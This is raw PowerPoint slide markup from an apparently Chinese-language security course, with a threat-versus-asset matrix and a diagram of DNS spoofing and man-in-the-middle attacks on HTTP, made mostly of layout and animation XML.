                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5530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305"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5530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5306"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="553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5307"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55307"/>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55308"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="55303" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="55304" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="55305" grpId="0" animBg="1"/>
      <p:bldP spid="55306" grpId="0" animBg="1"/>
      <p:bldP spid="55307" grpId="0" animBg="1"/>
      <p:bldP spid="553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609" name="Rectangle 257"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="850106"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>资源与威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="-2289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684" name="Line 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2697163" y="-2044700"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="rnd">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2356" name="Group 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="629110" y="911483"/>
          <a:ext cx="8064128" cy="5862791"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="432037"/>
                <a:gridCol w="390494"/>
                <a:gridCol w="1100031"/>
                <a:gridCol w="666334"/>
                <a:gridCol w="664671"/>
                <a:gridCol w="663009"/>
                <a:gridCol w="661349"/>
                <a:gridCol w="415420"/>
                <a:gridCol w="581587"/>
                <a:gridCol w="829179"/>
                <a:gridCol w="830839"/>
                <a:gridCol w="829178"/>
              </a:tblGrid>
              <a:tr h="213261">
                <a:tc rowSpan="2" gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="70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目标</a:t>
                      </a:r>
                      <a:endPar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l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="70000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-AU" sz="11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p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="70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威胁</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rowSpan="2" hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc rowSpan="2" hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc gridSpan="5">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数据</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gridSpan="4">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US" sz="11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应用与设施</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-AU" sz="11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150776">
                <a:tc vMerge="1" gridSpan="3">
                  <a:tcPr/>
                </a:tc>
                <a:tc vMerge="1" hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc vMerge="1" hMerge="1">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帐号</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口令</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组件</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进程</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操作系统</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计算机</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局域网</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广域网</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50776">
                <a:tc rowSpan="22">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="75000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endPar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0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="7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动作</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16">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="75000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endPar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0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="7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主动</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探测</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扫描</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溢出</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假冒</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"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伪装</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旁路控制</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服务欺骗</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0776">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授权侵犯</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3766">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窃取</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媒体清理</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物理侵入</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重放</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否认</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资源耗尽</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647">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更改</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陷门</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"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木马</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0776">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社交工程</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rowSpan="6">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="70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被动</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截获</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"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修改</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窃听</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电磁截获</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流量分析</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读取</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834">
                <a:tc vMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc vMerge="1">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拷贝</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r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-AU" sz="11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AU" sz="20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anose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="32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37" name="Rectangle 256"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8888413"/>
            <a:ext cx="2381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a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>注：√表示该目标可能面临的安全威胁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-AU" sz="1100"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>HTTP协议安全威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5632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42132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47813"/>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3995738"/>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7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3575050" y="2505075"/>
            <a:ext cx="1627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本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>服务器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6328" name="TextBox 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6554788" y="5076825"/>
            <a:ext cx="1550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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>web2.qq.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>21.120.12.12</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56329" name="TextBox 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1755775" y="5241925"/>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zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>客户端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56330" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1936750" y="1927225"/>
            <a:ext cx="1933575" cy="2166938"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 29281 w 1933183"/>
              <a:gd name="T1" fmla="*/ 2166425 h 2167003"/>
              <a:gd name="T2" fmla="*/ 317902 w 1933183"/>
              <a:gd name="T3" fmla="*/ 601087 h 2167003"/>
              <a:gd name="T4" fmla="*/ 1936713 w 1933183"/>
              <a:gd name="T5" fmla="*/ 0 h 2167003"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1933183"/>
              <a:gd name="T10" fmla="*/ 0 h 2167003"/>
              <a:gd name="T11" fmla="*/ 1933183 w 1933183"/>
              <a:gd name="T12" fmla="*/ 2167003 h 2167003"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1933183" h="2167003">
                <a:moveTo>
                  <a:pt x="29227" y="2167003"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="14613" y="1564709"/>
                  <a:pt x="0" y="962416"/>
                  <a:pt x="317326" y="601249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="634652" y="240082"/>
                  <a:pt x="1283917" y="120041"/>
                  <a:pt x="1933183" y="0"/>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331" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2705100" y="2665413"/>
            <a:ext cx="1390650" cy="1666875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1392738 w 1390389"/>
              <a:gd name="T1" fmla="*/ 0 h 1665961"/>
              <a:gd name="T2" fmla="*/ 966133 w 1390389"/>
              <a:gd name="T3" fmla="*/ 956689 h 1665961"/>
              <a:gd name="T4" fmla="*/ 0 w 1390389"/>
              <a:gd name="T5" fmla="*/ 1674207 h 1665961"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1390389"/>
              <a:gd name="T10" fmla="*/ 0 h 1665961"/>
              <a:gd name="T11" fmla="*/ 1390389 w 1390389"/>
              <a:gd name="T12" fmla="*/ 1665961 h 1665961"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1390389" h="1665961">
                <a:moveTo>
                  <a:pt x="1390389" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1293312" y="337159"/>
                  <a:pt x="1196236" y="674318"/>
                  <a:pt x="964504" y="951978"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="732773" y="1229638"/>
                  <a:pt x="366386" y="1447799"/>
                  <a:pt x="0" y="1665961"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>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332" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2792413" y="4306888"/>
            <a:ext cx="4084637" cy="350837"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4083485"/>
              <a:gd name="T1" fmla="*/ 351701 h 350729"/>
              <a:gd name="T2" fmla="*/ 1820894 w 4083485"/>
              <a:gd name="T3" fmla="*/ 12562 h 350729"/>
              <a:gd name="T4" fmla="*/ 4093868 w 4083485"/>
              <a:gd name="T5" fmla="*/ 276338 h 350729"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 4083485"/>
              <a:gd name="T10" fmla="*/ 0 h 350729"/>
              <a:gd name="T11" fmla="*/ 4083485 w 4083485"/>
              <a:gd name="T12" fmla="*/ 350729 h 350729"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="4083485" h="350729">
                <a:moveTo>
                  <a:pt x="0" y="350729"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="567846" y="187890"/>
                  <a:pt x="1135693" y="25052"/>
                  <a:pt x="1816274" y="12526"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2496855" y="0"/>
                  <a:pt x="3290170" y="137786"/>
                  <a:pt x="4083485" y="275573"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>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333" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2781300" y="4819650"/>
            <a:ext cx="4083050" cy="354013"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 4079577 w 4083485"/>
              <a:gd name="T1" fmla="*/ 0 h 352817"/>
              <a:gd name="T2" fmla="*/ 1977220 w 4083485"/>
              <a:gd name="T3" fmla="*/ 348661 h 352817"/>
              <a:gd name="T4" fmla="*/ 0 w 4083485"/>
              <a:gd name="T5" fmla="*/ 90391 h 352817"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 4083485"/>
              <a:gd name="T10" fmla="*/ 0 h 352817"/>
              <a:gd name="T11" fmla="*/ 4083485 w 4083485"/>
              <a:gd name="T12" fmla="*/ 352817 h 352817"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="4083485" h="352817">
                <a:moveTo>
                  <a:pt x="4083485" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3371589" y="161794"/>
                  <a:pt x="2659693" y="323589"/>
                  <a:pt x="1979112" y="338203"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1298531" y="352817"/>
                  <a:pt x="649265" y="220249"/>
                  <a:pt x="0" y="87682"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>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2" name="Group 17"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2771775" y="1052513"/>
            <a:ext cx="6156325" cy="3889375"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12133856" cy="7791042"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1546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33856" cy="779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664" y="701825"/>
              <a:ext cx="8791197" cy="28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1557338"/>
            <a:ext cx="666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1" name="TextBox 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6511925" y="2492375"/>
            <a:ext cx="18478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mail.google.com</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600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>74.125.71.83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56342" name="Freeform 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7899400" y="2413000"/>
            <a:ext cx="411163" cy="2108200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 410633"/>
              <a:gd name="T1" fmla="*/ 2108200 h 2108200"/>
              <a:gd name="T2" fmla="*/ 411146 w 410633"/>
              <a:gd name="T3" fmla="*/ 952500 h 2108200"/>
              <a:gd name="T4" fmla="*/ 25697 w 410633"/>
              <a:gd name="T5" fmla="*/ 0 h 2108200"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 410633"/>
              <a:gd name="T10" fmla="*/ 0 h 2108200"/>
              <a:gd name="T11" fmla="*/ 410633 w 410633"/>
              <a:gd name="T12" fmla="*/ 2108200 h 2108200"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="410633" h="2108200">
                <a:moveTo>
                  <a:pt x="0" y="2108200"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="201083" y="1706033"/>
                  <a:pt x="402167" y="1303867"/>
                  <a:pt x="406400" y="952500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="410633" y="601133"/>
                  <a:pt x="218016" y="300566"/>
                  <a:pt x="25400" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0C0C0C"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:bevel/>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344" name="Straight Connector 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="960438" y="2871787"/>
            <a:ext cx="3486150" cy="136525"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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6345" name="Straight Connector 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2635250" y="4683125"/>
            <a:ext cx="136525" cy="257175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">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54643" name="Freeform 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="179388" y="692150"/>
            <a:ext cx="1584325" cy="1584325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1296144"/>
              <a:gd name="T1" fmla="*/ 1506138 h 1296144"/>
              <a:gd name="T2" fmla="*/ 479497 w 1296144"/>
              <a:gd name="T3" fmla="*/ 441135 h 1296144"/>
              <a:gd name="T4" fmla="*/ 1637113 w 1296144"/>
              <a:gd name="T5" fmla="*/ 1 h 1296144"/>
              <a:gd name="T6" fmla="*/ 2794724 w 1296144"/>
              <a:gd name="T7" fmla="*/ 441139 h 1296144"/>
              <a:gd name="T8" fmla="*/ 3274218 w 1296144"/>
              <a:gd name="T9" fmla="*/ 1506146 h 1296144"/>
              <a:gd name="T10" fmla="*/ 2794720 w 1296144"/>
              <a:gd name="T11" fmla="*/ 2571146 h 1296144"/>
              <a:gd name="T12" fmla="*/ 1637109 w 1296144"/>
              <a:gd name="T13" fmla="*/ 3012286 h 1296144"/>
              <a:gd name="T14" fmla="*/ 479497 w 1296144"/>
              <a:gd name="T15" fmla="*/ 2571146 h 1296144"/>
              <a:gd name="T16" fmla="*/ 6 w 1296144"/>
              <a:gd name="T17" fmla="*/ 1506146 h 1296144"/>
              <a:gd name="T18" fmla="*/ 0 w 1296144"/>
              <a:gd name="T19" fmla="*/ 1506138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ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="230456" tIns="230456" rIns="230456" bIns="230456"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2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>中间人攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>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p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56325"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
